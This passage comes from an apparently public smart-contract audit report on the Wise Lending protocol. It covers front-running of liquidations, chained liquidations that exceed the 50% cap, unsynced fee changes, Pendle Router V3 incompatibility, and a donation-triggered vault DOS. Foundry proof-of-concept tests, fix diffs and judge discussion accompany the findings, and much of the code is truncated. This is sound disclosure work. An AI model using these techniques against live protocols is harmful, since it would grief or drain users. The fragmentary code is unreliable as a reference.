        uint256 maxShares = checkBadDebtThreshold(_borrowETHTotal, _unweightedCollateralETH)
            ? totalSharesUser
            : totalSharesUser * MAX_LIQUIDATION_50 / PRECISION_FACTOR_E18;

        if (_shareAmountToPay <= maxShares) {

        //@audit-issue => reverts if the amount of shares to be repaid exceeds maxShares!
        revert TooManyShares();

For example, if there is a position in a liquidable state that has 100 borrowShares on the PoolA, and a liquidator decides to liquidate the maximum possible amount of shares from this position, it will send a tx to liquidate 50 shares from that position on the PoolA. The position’s owner can use the WiseLending.paybackExactShares() function to repay 1 share and frontrun the liquidator’s tx. Now, when the liquidator’s tx is executed, the position is still liquidable, but it only has 99 borrowShares on the PoolA. As a result of this, the WiseSecurityHelper.checkMaxShares() function will determine that the maximum possible amount of liquidable shares is 49.5, and because the liquidator specified that he intended to liquidate 50 shares, the tx will be reverted.

In the WiseSecurityHelper.checkMaxShares() function, if the _shareAmountToPay exceeds maxShares, don’t revert; re-adjust the number of shares that can be liquidated. Return the final value of _shareAmountToPay and forward it back to the WiseLending.liquidatePartiallyFromTokens() function. Then, use the final value of shareAmountToPay to compute the exact amount of tokens to be repaid in the WiseLending.liquidatePartiallyFromTokens() function.


    function checksLiquidation(
        uint256 _shareAmountToPay
    +   returns (uint256)

    -   checkMaxShares(
    +   return checkMaxShares( 


function checkMaxShares(
    uint256 _shareAmountToPay
+   returns (uint256)    

    uint256 maxShares = checkBadDebtThreshold(_borrowETHTotal, _unweightedCollateralETH)
            ? totalSharesUser
            : totalSharesUser * MAX_LIQUIDATION_50 / PRECISION_FACTOR_E18;

    if (_shareAmountToPay <= maxShares) {
-       return;
+       return _shareAmountToPay;
+   } else {
+       return maxShares;
+   }

-   revert TooManyShares();


    function liquidatePartiallyFromTokens(
        uint256 _shareAmountToPay

    -   data.shareAmountToPay = _shareAmountToPay;


        //@audit-info => First, determine the maximum amount of liquidable shares
    +   data.shareAmountToPay = WISE_SECURITY.checksLiquidation(
    +     _nftId,
    +     _paybackToken,
    +     _shareAmountToPay
    +   );

        //@audit-info => Then, compute the exact amount of tokens required to liquidate the final amount of liquidable shares
        data.paybackAmount = paybackAmount(
    -       _shareAmountToPay
    +       data.shareAmountToPay


    -   WISE_SECURITY.checksLiquidation(
    -       _nftId,
    -       _paybackToken,
    -       _shareAmountToPay
    -   );


Assessed type


vonMangoldt (Wise Lending) commented:

Instead of wasting gas by frontrunning a newbie liquidator they could also make money and liquidate themselves. On Arbitrum it’s not possible at all. If liquidators don’t use tools like flashbots or eden, it’s their own fault. No reason to do anything here, in my opinion. Dismissed.

Trust (judge) commented:

Whether the option for liquidators to bypass hacks through private mempools is grounds for reducing severity of their abuse is not a trivial question and would best be standardized in the Supreme Court.

I’m taking a stance that this cheap hack is annoying enough for liquidators to be worth Medium severity. Note that if private mempool is in-scope, attacker can use it as well and insert the annoying TX at start of block.

vm06007 (Wise Lending) commented:

Mitigated here.

Mentioned issue does not seem to be in interest of the borrower, since borrower is more incentivized to perform self-liquidation to earn than preventing others, which becomes a race on who will liquidate first making liquidation a more desired outcome for both parties, no intention to gate the minimum payback threshold by admin.

[M-09] Liquidating chaining can be achieved by liquidating token collateral with the highest collateralFactor

Submitted by Draiakoo

The liquidation mechanism is intended as follows:

  • If a user has more borrowed value than weighted collateral, but it does not surpass the 89% of the unweighted collateral, he can be liquidated up to 50% of his borrowed shares.
  • When the borrowed amount surpass the 89% of the unweighted collateral, then it is considered bad debt and the position can be fully liquidated

This feature is programmed here

However, since the liquidator can select which collateral he will receive, he can intentionally liquidate the highest collateralFactor tokens in order to make the overall position’s collateralFactor to go down and being able to keep liquidating the other tokens. Since the intended maximum amount to liquidate when the position has no bad debt is 50%, if a user can intentionally create a sequence of liquidation that leads to a greater percentage it can be considered a high impact vulnerability.

Written Proof of Concept

Imagine the following situation:

The protocol supports these 4 tokens, A, B, C and D with these collateralFactors:

Token Collateral factor
A 0.85
B 0.65
C 0.50
D 0.70

The initial prices for these tokens are as follows:

Token Price (in ETH)
A 1
B 0.2
C 0.5
D 1

Alice deposits these 3 amounts of token A, B and C as collateral:

Token Value Amount Unweighted value Weighted value
A 1 10 10 8.5
B 0.2 50 10 6.5
C 0.5 20 10 5
Total values 30 20

Alice can borrow up to 20 * 0.95 = 19 worth of ETH. For the sake of simplicity, since token D is valued 1 ETH, she can borrow up to 19 of token D. However, she decides to borrow 18.9 to have a tiny healthy zone. Unfortunately for Alice, the price of token C drops to 0.25. And the situation continues as follows:

Token Value Amount Unweighted value Weighted value
A 1 10 10 8.5
B 0.2 50 10 6.5
C 0.25 20 5 2.5
Total values 25 17.5

In this stage, Alice can be liquidated up to 50% because her borrowed amount (18.9 ETH) is greater than her weighted value (17.5 ETH). Just 50% is liquidable because the 89% of her weighted value is greater than her borrowed amount.

Let’s now demonstrate that if the liquidator receives the token with the highest collateralFactor, the position will still be liquidable and he can chain this function call in order to liquidate a huge amount of collateral.

The liquidator decides to repay 9.09 shares of token D. He intentionally selects this amount because when added to the fee (10%), the total amount will be 10 worth of ETH. Hence, liquidating this amount, the user is liquidating the whole token A collateral from Alice with the highest collateralFactor. The new borrowed value from Alice would be 18.9 - 9.09 = 9.81.

Token Value Amount Unweighted value Weighted value
A 1 0 0 0
B 0.2 50 10 6.5
C 0.25 20 5 2.5
Total values 15 9

We can clearly see that the borrowed value is still greater than Alice’s weighted value. Hence, she can be liquidated again! See Coded Proof of Concept to see the full chain liquidation.

The scenario completely changes if the liquidator would be forced to liquidate the collateral with the lowest collateralFactor. The liquidator is forced to receive token C (lowest collateralFactor). He decides to repay 4.54 worth of token D that when added with the fee (10%) will be 5. The whole value of collateral token C.

Token Value Amount Unweighted value Weighted value
A 1 10 10 8.5
B 0.2 50 10 6.5
C 0.25 0 0 0
Total values 20 15

The new borrowed value would be 18.9 - 4.54 = 14.36. This new borrowed value is smaller than the weighted value. Thus, Alice is no longer liquidable and her position is healthy. See coded Proof of Concept.

Coded Proof of Concept

For the sake of testing, I adjusted the collateral factors manually when deploying the protocol locally:

            createPoolArray[0] = PoolManager.CreatePool(
    				// Token A
                    allowBorrow: true,
                    poolToken: address(MOCK_ERC20_1),
                    poolMulFactor: 17500000000000000,
                    poolCollFactor: 0.85 ether,
                    maxDepositAmount: 10000000000000 ether

            createPoolArray[1] = PoolManager.CreatePool(
    				// Token B
                    allowBorrow: true,
                    poolToken: address(MOCK_ERC20_2),
                    poolMulFactor: 25000000000000000,
                    poolCollFactor: 0.65 ether,
                    maxDepositAmount: 10000000000000 ether

            createPoolArray[2] = PoolManager.CreatePool(
    				// Token C
                    allowBorrow: true,
                    poolToken: address(MOCK_ERC20_3),
                    poolMulFactor: 15000000000000000,
                    poolCollFactor: 0.5 ether,
                    maxDepositAmount: 10000000000000 ether

            createPoolArray[3] = PoolManager.CreatePool(
    				// Token D
                    allowBorrow: true,
                    poolToken: address(MOCK_WETH),
                    poolMulFactor: 17500000000000000,
                    poolCollFactor: 0.7 ether,
                    maxDepositAmount: 10000000000000 ether

And also created a function inside the MockChainlink to set the prices of the tokens:

    	function setNewPrice(uint256 newPrice) public {
            ethValuePerToken = newPrice;

With all that said, let’s see the PoC for the 2 previously explained situations:

Alice can be liquidated multiple times:

        function testChainLiquidation() public {
            address token1 = 0xfDf134B61F8139B8ea447eD49e7e6adf62fd4B49;
            address token2 = 0xEa3aF45ae5a2bAc059Cd026f23E47bdD753E664a;
            address token3 = 0x15BB461b3a994218fD0D6329E129846F366FFeB3;
            address token4 = 0x6B9d657Df9Eab179c44Ff9120566A2d423d01Ea9;


            // Add some tokens4 to have enough liquidity
            address thirdParty = makeAddr("thirdParty");
            deal(address(token4), thirdParty, 1_000_000 ether);
            IERC20(token4).approve(address(LENDING_INSTANCE), 1_000_000 ether);
            LENDING_INSTANCE.depositExactAmountMint(token4, 1_000_000 ether);

            // Initially the price for tokens are:
            // 1 Token1 = 1 ETH
            MOCK_CHAINLINK_1.setNewPrice(1 ether);
            // 1 Token2 = 0.2 ETH
            MOCK_CHAINLINK_2.setNewPrice(0.2 ether);
            // 1 Token3 = 0.5 ETH
            MOCK_CHAINLINK_3.setNewPrice(0.5 ether);
            // 1 Token4 = 1 ETH
            MOCK_CHAINLINK_4.setNewPrice(1 ether);

            // Bob is liquidating Alice
            address alice = makeAddr("alice");
            address bob = makeAddr("bob");
            deal(token1, alice, 10 ether);
            deal(token2, alice, 50 ether);
            deal(token3, alice, 20 * 10**6);
            deal(token4, bob, 200 ether);

            IERC20(token1).approve(address(LENDING_INSTANCE), 10 ether);
            LENDING_INSTANCE.depositExactAmountMint(token1, 10 ether);
            IERC20(token2).approve(address(LENDING_INSTANCE), 50 ether);
            LENDING_INSTANCE.depositExactAmount(6, token2, 50 ether);
            IERC20(token3).approve(address(LENDING_INSTANCE), 20 * 10**6);
            LENDING_INSTANCE.depositExactAmount(6, token3, 20 * 10**6);
            LENDING_INSTANCE.borrowExactAmount(6, token4, 18.9 ether);
            uint256 initialBorrowShares = LENDING_INSTANCE.getPositionBorrowShares(6, token4);

            // Time passes and value of token3 drops significantly
            // 1 Token3 = 0.25 ETH
            MOCK_CHAINLINK_3.setNewPrice(0.25 ether);

            IERC20(token4).approve(address(LENDING_INSTANCE), 200 ether);
            LENDING_INSTANCE.depositExactAmountMint(token4, 10 ether);
            LENDING_INSTANCE.liquidatePartiallyFromTokens(6, 7, token4, token1, 9.090909090909 ether);
            LENDING_INSTANCE.liquidatePartiallyFromTokens(6, 7, token4, token2, 2.7 ether);
            LENDING_INSTANCE.liquidatePartiallyFromTokens(6, 7, token4, token2, 3.5 ether);

            uint256 finalBorrowShares = LENDING_INSTANCE.getPositionBorrowShares(6, token4);

            uint256 percentageLiquidated = 100 - (finalBorrowShares * 100 / initialBorrowShares);
            console.log("Percentage liquidated", percentageLiquidated);


    [PASS] testChainLiquidation() (gas: 44546965)
      Percentage liquidated 81

    Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 38.40ms

    Ran 1 test suite in 38.40ms: 1 tests passed, 0 failed, 0 skipped (1 total tests)

With 3 liquidation calls, the liquidator could repay 81% of Alice’s position when in fact, the maximum percentage that the protocol allows when there is no bas debt is 50%.

Alice can only be liquidated once with the asset with lowest collateralFactor and then her position becomes healthy:

        function testLiquidationsConstrainted() public {
            address token1 = 0xfDf134B61F8139B8ea447eD49e7e6adf62fd4B49;
            address token2 = 0xEa3aF45ae5a2bAc059Cd026f23E47bdD753E664a;
            address token3 = 0x15BB461b3a994218fD0D6329E129846F366FFeB3;
            address token4 = 0x6B9d657Df9Eab179c44Ff9120566A2d423d01Ea9;

            uint256 aliceNftPosition = 6;
            uint256 bobNftPosition = 7;


            // Add some tokens4 to have enough liquidity
            address thirdParty = makeAddr("thirdParty");
            deal(address(token4), thirdParty, 1_000_000 ether);
            IERC20(token4).approve(address(LENDING_INSTANCE), 1_000_000 ether);
            LENDING_INSTANCE.depositExactAmountMint(token4, 1_000_000 ether);

            // Initially the price for tokens are:
            // 1 Token1 = 1 ETH
            MOCK_CHAINLINK_1.setNewPrice(1 ether);
            // 1 Token2 = 0.2 ETH
            MOCK_CHAINLINK_2.setNewPrice(0.2 ether);
            // 1 Token3 = 0.5 ETH
            MOCK_CHAINLINK_3.setNewPrice(0.5 ether);
            // 1 Token4 = 1 ETH
            MOCK_CHAINLINK_4.setNewPrice(1 ether);

            // Bob is liquidating Alice
            address alice = makeAddr("alice");
            address bob = makeAddr("bob");
            deal(token1, alice, 10 ether);
            deal(token2, alice, 50 ether);
            deal(token3, alice, 20 * 10**6);
            deal(token4, bob, 200 ether);

            IERC20(token1).approve(address(LENDING_INSTANCE), 10 ether);
            LENDING_INSTANCE.depositExactAmountMint(token1, 10 ether);
            IERC20(token2).approve(address(LENDING_INSTANCE), 50 ether);
            LENDING_INSTANCE.depositExactAmount(aliceNftPosition, token2, 50 ether);
            IERC20(token3).approve(address(LENDING_INSTANCE), 20 * 10**6);
            LENDING_INSTANCE.depositExactAmount(aliceNftPosition, token3, 20 * 10**6);
            LENDING_INSTANCE.borrowExactAmount(aliceNftPosition, token4, 18.9 ether);
            uint256 initialBorrowShares = LENDING_INSTANCE.getPositionBorrowShares(aliceNftPosition, token4);

            // Time passes and value of token3 drops significantly
            // 1 Token3 = 0.25 ETH
            MOCK_CHAINLINK_3.setNewPrice(0.25 ether);

            IERC20(token4).approve(address(LENDING_INSTANCE), 200 ether);
            LENDING_INSTANCE.depositExactAmountMint(token4, 10 ether);
            LENDING_INSTANCE.liquidatePartiallyFromTokens(aliceNftPosition, bobNftPosition, token4, token3, 4.54 ether);

            // Having liquidated the token with less LVT, the position is no longer liquidable
            // Try to liquidate with the minimum amount of shares (1)
            LENDING_INSTANCE.liquidatePartiallyFromTokens(aliceNftPosition, bobNftPosition, token4, token3, 1);

            uint256 finalBorrowShares = LENDING_INSTANCE.getPositionBorrowShares(aliceNftPosition, token4);

            uint256 percentageLiquidated = 100 - (finalBorrowShares * 100 / initialBorrowShares);
            console.log("Percentage liquidated", percentageLiquidated);


    [PASS] testLiquidationsConstrainted() (gas: 44044788)
      Percentage liquidated 25

    Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 40.81ms

    Ran 1 test suite in 40.81ms: 1 tests passed, 0 failed, 0 skipped (1 total tests)

With just a single liquidation call, the liquidator could only repay 25% of Alice’s position and at that point, her position becomes healthy and she is no longer liquidable.

This issue can be easily solved by forcing all liquidations to be done with the lowest collateralFactor tokens first. As shown in the written and coded PoC, if the user would have been forced to receive the collateral token with the lowest collateralFactor, the health of the position would go to non-liquidable and the liquidator would not be able to continue liquidating the position.

Also, a really good safety check would be to ensure that after the liquidation is executed, the health of the position must be good in order to prevent this chain liquidation.

Assessed type


vonMangoldt (Wise Lending) commented:

This is not an issue since the liquidation incentive usually is lower than the difference in percentage between 100 and collateral factor. So paying back in my described scenario always makes the position more healthy. High as a description is overblown! Also, such a force could lead liquidators to be forced to loose money on a specific scenario before being able to access a profitable liquidation endangering the protocol.

Trust (judge) decreased severity to Medium and commented:

Cascading liquidations are a dangerous situation and I agree with the warden there are no built-in safety mechanisms around it in the liquidation routines (health is monotonically increasing or it is now healthy).

However, the warden had to modify the collateral factors to demonstrate the issue in a PoC. It seems hard to determine whether by natural course of action, such a scenario would occur.

According to the sponsor’s remarks, the liquidation incentive *usually* is lower than the difference in percentage between 100 and collateral factor. This has not convinced me it could not occur by chance at some point. In case it does, it leads to higher than expected liquidation penalties. Weighing all the circumstances, I believe Medium to be appropriate.

Wise Lending commented:

Mitigated here.

[M-10] Lack of update when modifying pool fee

Submitted by 0xCiphky

The FeeManager contract allows the master address to modify the pool fee. This can be done to a single pool using the setPoolFee function or multiple pools at once using the setPoolFeeBulk function. This fee is used in the the syncPool modifier, specifically the _updatePseudoTotalAmounts function which updates the interest amounts of the borrow and lending pools.

    function setPoolFee(
        address _poolToken,
        uint256 _newFee


        emit PoolFeeChanged(

The issue is that the setPoolFee function modifies the pool fee without invoking the syncPool modifier beforehand. Consequently, the next sync operation incorrectly applies the updated pool fee to the period between the previous call and the change in the pool fee. Although the impact of changing the fee for a single pool may be minimal, using the setPoolFeeBulk function to alter fees for multiple pools could have a bigger impact.


Depending on whether the pool fee is increased or decreased, the protocol or its users may end up paying additional fees or receiving reduced fees.

Likelihood: Low. This situation arises solely in instances where there is a change in the pool fee.


Add the following code to update fees accurately before implementing changes:

    function setPoolFee(
        address _poolToken,
        uint256 _newFee
	WISE_LENDING.syncManually(_poolToken); //add here


        emit PoolFeeChanged(

Assessed type


vm06007 (Wise Lending) commented:

Admin can also call this manually (syncManually) directly on the contract after changing fee.

Trust (judge) commented:

@vm06007 - This is true; but for it to reduce severity, we would need to see indication that likelihood of this happening (ergo, that the issue is known) is high.

Foon256 (Wise Lending) commented:

@Trust - But this is clearly a centralization issue and is OOS. Or what do I miss here?

Trust (judge) commented:

Not every flaw in a privileged function can be viewed as a centralization issue. Warden demonstrated a plausible way where an HONEST admin interaction leads to incorrect fee allocation, which I consider to be in scope.

vm06007 (Wise Lending) commented:

@Trust - It seems “honest” is something caps-locked here so we better unfold this:

  • If admin decides not to call this, there is no issue.
  • If admin decides to call this and knows what to do then, there is no issue.
  • If admin decides to call this and does not know what to do only then it is an issue, so it falls under a category where it does not matter the intention of the admin (honest or dishonest can’t really be a thing here). It is more of a question will admin make a mistake when calling that function without follow up, or admin does not make a mistake and makes correct calls on sync as well.

Also it is in admins interest to make correct calls as expected. If admin makes a mistake then it is same topic of “admin error” no matter the intention.

Trust (judge) commented:

Post-Judging QA is over, so unfortunately, we cannot consider any more arguments (in this submission or any other). I don’t see how we can be confident admin knows to follow up this call correctly. If they are not aware of the issue in the report, that’s the meaning of an honest mistake in my mind.

Wise Lending commented:

Mitigated here.

[M-11] PendlePowerManager is incompatible with PendleRouterV3

Submitted by NentoR






Will cause revert when attempting to open a farm position.

Proof of Concept

The latest deployment of the Pendle router, PendleRouterV3, is incompatible with the PendlePowerManager contract. The sponsor is expecting full compatibility with both but this is not the case here. The problem stems from the calls made to PENDLE_ROUTER.removeLiquiditySingleSy() and PENDLE_ROUTER.addLiquiditySingleSy():

function _logicOpenPosition(
    bool _isAave,
    uint256 _nftId,
    uint256 _depositAmount,
    uint256 _totalDebtBalancer,
    uint256 _allowedSpread
    // ...
        uint256 netLpOut
    ) = PENDLE_ROUTER.addLiquiditySingleSy(
            _receiver: address(this),
            _market: address(PENDLE_MARKET),
            _netSyIn: syReceived,
            _minLpOut: 0,
            _guessPtReceivedFromSy: ApproxParams(
                    guessMin: netPtFromSwap - 100,
                    guessMax: netPtFromSwap + 100,
                    guessOffchain: 0,
                    maxIteration: 50,
                    eps: 1e15
  // ...

function _logicClosePosition(
    uint256 _nftId,
    uint256 _borrowShares,
    uint256 _lendingShares,
    uint256 _totalDebtBalancer,
    uint256 _allowedSpread,
    address _caller,
    bool _ethBack,
    bool _isAave
    // ...
        uint256 netSyOut
    ) = PENDLE_ROUTER.removeLiquiditySingleSy(
            _receiver: address(this),
            _market: address(PENDLE_MARKET),
            _netLpToRemove: withdrawnLpsAmount,
            _minSyOut: 0
  // ...

The issue is that the signatures of those have changed in V3:

function addLiquiditySingleSy(
    address receiver,
    address market,
    uint256 netSyIn,
    uint256 minLpOut,
    ApproxParams calldata guessPtReceivedFromSy,
    LimitOrderData calldata limit
) external returns (uint256 netLpOut, uint256 netSyFee);

function removeLiquiditySingleSy(
    address receiver,
    address market,
    uint256 netLpToRemove,
    uint256 minSyOut,
    LimitOrderData calldata limit
) external returns (uint256 netSyOut, uint256 netSyFee);

There’s a new parameter called limit that’s not accounted for in the calls in the PendlePowerFarmLeverageLogic helper contract. This will lead to calls always reverting with RouterInvalidAction due to Pendle’s proxy not being able to locate the selector used.

Coded POC (PendlePowerFarmControllerBase.t.sol):

function _setUpCustom(address _pendleRouter) private {

    pendleLockInstance = IPendleLock(AddressesMap[chainId].pendleLock);

    wethInstance = IWETH(AddressesMap[chainId].weth);

    wiseOracleHubInstance = WiseOracleHub(AddressesMap[chainId].oracleHub);

    aaveHubInstance = IAaveHub(AddressesMap[chainId].aaveHub);


    controllerTester = new PendleControllerTester(

    pendlePowerFarmTokenFactory = controllerTester.PENDLE_POWER_FARM_TOKEN_FACTORY();

    PoolManager.CreatePool memory params = PoolManager.CreatePool({
        allowBorrow: true,
        poolToken: AddressesMap[chainId].aweth,
        poolMulFactor: 17500000000000000,
        poolCollFactor: 805000000000000000,
        maxDepositAmount: 1800000000000000000000000


        AddressesMap[chainId].weth, AddressesMap[chainId].aweth

    if (block.chainid == ETH_CHAIN_ID) {
            new address[](0)



        2 ether,
        3 ether

    IPendlePowerFarmToken derivativeToken =
        _addPendleMarket(AddressesMap[chainId].PendleMarketStEth, "name", "symbol", MAX_CARDINALITY);

    pendleChildLpOracleInstance = new PendleChildLpOracle(address(pendleLpOracleInstance), address(derivativeToken));

    address[] memory underlyingTokens = new address[](1);
    underlyingTokens[0] = AddressesMap[chainId].weth;

        address(derivativeToken), IPriceFeed(address(pendleChildLpOracleInstance)), underlyingTokens

    address[] memory underlyingTokensCurrent = new address[](0);

    wiseOracleHubInstance.addOracle(CRV_TOKEN_ADDRESS, IPriceFeed(CRV_ETH_FEED), underlyingTokensCurrent);


    curveUsdEthOracleInstance = new CurveUsdEthOracle(IPriceFeed(ETH_USD_FEED), IPriceFeed(CRVUSD_USD_FEED));

        CRVUSD_TOKEN_ADDRESS, IPriceFeed(address(curveUsdEthOracleInstance)), new address[](0)




    address underlyingFeed = CRVUSD_TOKEN_ADDRESS;

        CRVUSD_PENDLE_28MAR_2024, address(curveUsdEthOracleInstance), underlyingFeed, 0.0008 ether, 0.0016 ether

    derivativeToken = _addPendleMarket(CRVUSD_PENDLE_28MAR_2024, "name", "symbol", MAX_CARDINALITY);

    pendleChildLpOracleInstance = new PendleChildLpOracle(address(pendleLpOracleInstance), address(derivativeToken));

    underlyingTokens = new address[](1);
    underlyingTokens[0] = underlyingFeed;

        address(derivativeToken), IPriceFeed(address(pendleChildLpOracleInstance)), underlyingTokens

    PoolManager.CreatePool[] memory createPoolArray = new PoolManager.CreatePool[](3);

    createPoolArray[0] = PoolManager.CreatePool({
        allowBorrow: true,
        poolToken: CRVUSD_TOKEN_ADDRESS,
        poolMulFactor: 17500000000000000,
        poolCollFactor: 740000000000000000,
        maxDepositAmount: 2000000000000000000000000

    createPoolArray[1] = PoolManager.CreatePool({
        allowBorrow: false,
        poolToken: controllerTester.pendleChildAddress(AddressesMap[chainId].PendleMarketStEth),
        poolMulFactor: 17500000000000000,
        poolCollFactor: 740000000000000000,
        maxDepositAmount: 2000000000000000000000000

    createPoolArray[2] = PoolManager.CreatePool({
        allowBorrow: false,
        poolToken: controllerTester.pendleChildAddress(CRVUSD_PENDLE_28MAR_2024),
        poolMulFactor: 17500000000000000,
        poolCollFactor: 740000000000000000,
        maxDepositAmount: 2000000000000000000000000

    for (uint256 i = 0; i < createPoolArray.length; i++) {

    powerFarmNftsInstance = new PowerFarmNFTs("", "");

    powerFarmManagerInstance = new PendlePowerManager(

    wiseLendingInstance.setVerifiedIsolationPool(address(powerFarmManagerInstance), true);


    if (block.chainid == ETH_CHAIN_ID) {
        address wethWhaleEthMain = 0x8EB8a3b98659Cce290402893d0123abb75E3ab28;


        wethInstance.transfer(wiseLendingInstance.master(), 1000 ether);



    IERC20(AddressesMap[chainId].weth).approve(address(powerFarmManagerInstance), 1000000 ether);

    wiseSecurityInstance = IWiseSecurity(wiseLendingInstance.WISE_SECURITY());

    positionNftsInstance = IPositionNFTs(wiseLendingInstance.POSITION_NFT());

function testCompatibleWithRouter() public {
    address pendleRouter = 0x0000000001E4ef00d069e71d6bA041b0A16F7eA0;

function testFail_IncompatibleWithRouterV3() public {
    address pendleRouterV3 = 0x00000000005BBB0EF59571E58418F9a4357b68A0;
    // Reverts with "RouterInvalidAction"

Support only the latest router (V3) or add conditional checks to use the respective selector for each router version.

Trust (judge) commented:

By definition a codebase can never be guaranteed to be compatible with the latest version. Requesting warden to provide evidence lack of integration with V3 achieves M+ severity.

NentoR (warden) commented:

@Trust - The reason why I reported this was because the sponsor told me they expect compatibility with both. The problem is that an older version of pendle router is used here and the calls for addLiquiditySingleSy() and removeLiquiditySingleSy() are basically incompatible with the new one and will revert because of a missing parameter. To understand the rationale behind this submission, let’s examine the deployed contracts:

Current router version (taken from test files).

PendleRouterV3 (latest).

Here’s the code for both on Deth.net: Old router and New one.

The functions can be found inActionAddRemoveLiq and ActionAddRemoveLiqV3

Old one:

  /// @dev swaps SY to PT, then adds liquidity
  function _addLiquiditySingleSy(
      address receiver,
      address market,
      IPYieldToken YT,
      uint256 netSyIn,
      uint256 minLpOut,
      ApproxParams calldata guessPtReceivedFromSy
  ) internal returns (uint256 netLpOut, uint256 netSyFee) {
      MarketState memory state = IPMarket(market).readState(address(this));
      // ...

New one:

function addLiquiditySingleToken(
    address receiver,
    address market,
    uint256 minLpOut,
    ApproxParams calldata guessPtReceivedFromSy,
    TokenInput calldata input,
    LimitOrderData calldata limit
) external payable returns (uint256 netLpOut, uint256 netSyFee, uint256 netSyInterm) {
    (IStandardizedYield SY, , IPYieldToken YT) = IPMarket(market).readTokens();

    netSyInterm = _mintSyFromToken(_entry_addLiquiditySingleSy(market, limit), address(SY), 1, input);

    (netLpOut, netSyFee) = _addLiquiditySingleSy(
    // ...

function _addLiquiditySingleSy(
    address receiver,
    address market,
    IStandardizedYield SY,
    IPYieldToken YT,
    uint256 netSyIn,
    uint256 minLpOut,
    ApproxParams calldata guessPtReceivedFromSy,
    LimitOrderData calldata limit
) internal returns (uint256 netLpOut, uint256 netSyFee) {
    uint256 netSyLeft = netSyIn;
    uint256 netPtReceived;

    if (!_isEmptyLimit(limit)) {
        (netSyLeft, netPtReceived, netSyFee, ) = _fillLimit(market, SY, netSyLeft, limit);
        _transferOut(address(SY), market, netSyLeft);

    (uint256 netPtOutMarket, , ) = _readMarket(market).approxSwapSyToAddLiquidity(
    // ...

_readMarket() comes from ActionBase, here’s it’s definition:

 function _readMarket(address market) internal view returns (MarketState memory) {
      return IPMarket(market).readState(address(this));

You can see that both call readState() from the underlying Pendle market. Here you can find all market deployments: https://docs.pendle.finance/Developers/Deployments/Arbitrum#markets

I’ll use the first one for the example. Arbiscan: https://arbiscan.io/address/0x7D49E5Adc0EAAD9C027857767638613253eF125f Deth.net: https://arbiscan.deth.net/address/0x7D49E5Adc0EAAD9C027857767638613253eF125f

If you look at the definion of readState(), you’ll see the following:

function readState(address router) public view returns (MarketState memory market) {
    market.totalPt = _storage.totalPt;
    market.totalSy = _storage.totalSy;
    market.totalLp = totalSupply().Int();

    (market.treasury, market.lnFeeRateRoot, market.reserveFeePercent) = IPMarketFactory(

    market.scalarRoot = scalarRoot;
    market.expiry = expiry;

    market.lastLnImpliedRate = _storage.lastLnImpliedRate;

readState() on all markets reaches out to the factory contract it was deployed with to grab the market configuration. And there are two versions: MarketFactory and MarketFactoryV3. Again, both can be found in the docs but here are the links:

MarketFactory and MarketFactory V3.

You can take a market from the docs and query Market::isValidMarket(). Using the first one, the old factory will return true whereas the new one, false.

So basically what this all means is that the protocol won’t be able to use new markets. Pendle can start phasing out the old ones and migrating them over. The fix is rather easy on the protocol’s end, they just need to account for the newly added parameter and can support both, if they wish, using a conditional check.

Trust (judge) commented:

@vonMangoldt - can you confirm the warden’s claims around your intentions?

Trust (judge) commented:

Without sponsor’s take the warden’s claim that V3 should be compatible with the design is accepted.

Wise Lending commented:

Mitigated here.

[M-12] PendlePowerFarmToken:: totalLpAssetsToDistribute may lead to temporary DOS due to price growth check being skipped during deposit

Submitted by NentoR, also found by NentoR and 00xSEV





Random actors, malicious or not, can DOS the Pendle PowerFarm vault by sending rewards to it through PendlePowerFarmToken::addCompoundRewards() or PendlePowerFarmController::exchangeRewardsForCompoundingWithIncentive(). This results in all users being unable to access their positions or open new ones for a set amount of time imposed by PendlePowerFarmToken::_validateSharePriceGrowth().

Proof of Concept

The PendlePowerFarmToken has a mechanism in place that protects the vault from people looping and increasing the share price:

function _validateSharePriceGrowth(
    uint256 _sharePriceNow
    uint256 timeDifference = block.timestamp

    uint256 maximum = timeDifference

    if (_sharePriceNow > maximum) {
        revert InvalidSharePriceGrowth();

This is a private function invoked from the syncSupply() modifier, which is used for the following functions:

  • manualSync()
  • addCompoundRewards()
  • depositExactAmount()
  • withdrawExactShares()
  • withdrawExactAmount()

The entry point of this exploit is addCompoundRewards():

function addCompoundRewards(
    uint256 _amount
    if (_amount == 0) {
        revert ZeroAmount();

    totalLpAssetsToDistribute += _amount;

    if (msg.sender == PENDLE_POWER_FARM_CONTROLLER) {


We can see that it allows users to donate their tokens to the vault to increase the totalLpAssetsToDistribute. This is then distributed among holders with subsequent calls to the aforementioned functions.

This is the code for the syncSupply() modifier:

modifier syncSupply()
    uint256 sharePriceBefore = _getSharePrice();

The problem here is that even though addCompoundRewards() calls it, the rewards added do not affect the share price immediately. It’s still the previously deposited amount. So, the condition _sharePriceNow > maximum holds true at the time someone calls addCompoundRewards() but causes a revert with subsequent calls to functions dependent on the modifier until enough time passes for the condition to hold true again.

Coded POC (PendlePowerFarmControllerBase.t.sol):

 function testDOSVault() public normalSetup(true) {
    (IERC20 tokenReceived, uint256 balanceReceived) =
        _getTokensToPlayWith(CRVUSD_PENDLE_28MAR_2024, crvUsdMar2024LP_WHALE);

    (uint256 depositAmount, IPendlePowerFarmToken derivativeToken) =
        _prepareDeposit(CRVUSD_PENDLE_28MAR_2024, tokenReceived, balanceReceived);

    address alice = makeAddr("alice");
    address bob = makeAddr("bob");
    address charlie = makeAddr("charlie");

    IERC20 pendleLpToken = IERC20(CRVUSD_PENDLE_28MAR_2024);

    pendleLpToken.transfer(alice, 1.3e18);
    pendleLpToken.transfer(bob, 2e18);
    pendleLpToken.transfer(charlie, 1e18);

    pendleLpToken.approve(address(derivativeToken), 1.3e18);

    pendleLpToken.approve(address(derivativeToken), 2e18);

    // DOS happens once timestamp changes
    vm.warp(block.timestamp + 1 seconds);

    // Charlie cannot deposit
    pendleLpToken.approve(address(derivativeToken), 1e18);
    vm.expectRevert(); // InvalidSharePriceGrowth
    derivativeToken.depositExactAmount(1 ether);

    // Alice cannot withdraw
    vm.expectRevert(); // InvalidSharePriceGrowth

    // After 8 weeks, transactions still fail since _sharePriceNow is still greater than maximum (look at PendlePowerFarmToken::__validateSharePriceGrowth())
    vm.warp(block.timestamp + 8 weeks);

    // Alice still cannot withdraw
    vm.expectRevert(); // InvalidSharePriceGrowth

    // From this point onwards, maximum > _sharePriceNow
    vm.warp(block.timestamp + 9 weeks);

    // Charlie can now deposit
    pendleLpToken.approve(address(derivativeToken), 1e18);
    derivativeToken.depositExactAmount(1 ether);

    // Alice can now deposit

